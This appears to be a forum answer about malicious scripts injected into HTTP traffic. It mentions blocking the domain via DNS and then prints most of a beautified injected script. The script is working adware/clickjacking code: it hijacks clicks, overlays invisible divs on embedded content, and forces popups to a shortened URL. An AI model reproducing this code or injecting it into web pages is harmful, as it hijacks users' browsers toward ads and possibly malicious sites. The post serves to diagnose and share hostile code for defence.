My quick patch to this problem was to block any DNS request to that domain.
This does not (probably) solve the problem at the root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in
http
requests,
- they intercept any first click bubbling to the
<html>
tag,
- they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.
I've partially beautified it below:
var PPid = "p20161003pr";
var PPRet = [];
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? [] : PPbl.split(" ");
PPwl = PPwl == "" ? [] : PPwl.split(" ");
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
l = _0x50e8x14 == "w" ? PPwl : PPbl;
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
;delete l;
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
cookieStartIndex += 2
}
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
;PPac = PPnCL()
}
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
try {
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
function bcStart() {
if (!startScript) {
startScript = !0;
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
document.getElementsByClassName = function(className) {
var matchingElements = [];
className = new RegExp("\b" + className + "\b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}